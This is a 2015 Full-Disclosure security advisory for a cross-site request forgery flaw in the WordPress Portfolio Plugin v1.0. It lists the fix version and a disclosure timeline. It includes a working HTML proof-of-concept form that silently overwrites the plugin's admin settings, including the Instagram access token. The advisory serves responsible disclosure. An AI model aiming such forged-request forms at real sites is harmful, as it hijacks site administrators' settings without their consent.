lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 20 Jul 2015 01:11:02 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Cross-Site Request Forgery Vulnerability in Portfolio Plugin
 Wordpress Plugin v1.0

# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin
Wordpress Plugin v1.0
# Submitter: Nitin Venkatesh
# Product: Portfolio Plugin Wordpress Plugin
# Product URL: https://wordpress.org/plugins/portfolio-by-lisa-westlund/
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.0
# Tested versions: v1.0
# Fixed Version: v1.05
# Link to code diff:
https://plugins.trac.wordpress.org/changeset/1175403/portfolio-by-lisa-westlund
# Changelog:
https://plugins.trac.wordpress.org/log/portfolio-by-lisa-westlund
# CVE Status: None/Unassigned/Fresh

## Product Information:

Use Instagram to display your portfolio. Choose whether to display all
images from your account, or only the ones you tag with a custom hashtag.

## Vulnerability Description:

The admin form in Portfolio Plugin v1.0 is susceptible to CSRF.

## Proof of Concept:

<form action="
http://localhost/wp-admin/options-general.php?page=instagram-portfolio"
method="post">
<input type="hidden" name="wplw_form_submitted" value='Y' />
<input type="hidden" name="wplw_instagram_access_token" value='evil-token1'
/>
<input type="hidden" name="wplw_instagram_userID" value='nitstorm' />
<input type="hidden" name="wplw_hashtag" value='csrf' />
<input type="hidden" name="wplw_settings_submit" value='Save' />
<input type="submit" value="submit" />
</form>

## Solution:

Upgrade to v1.05 or later.

## Disclosure Timeline:

2015-06-03 - Discovered. Mailed developer.
2015-06-05 - Updated v1.05 released.
2015-07-20 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists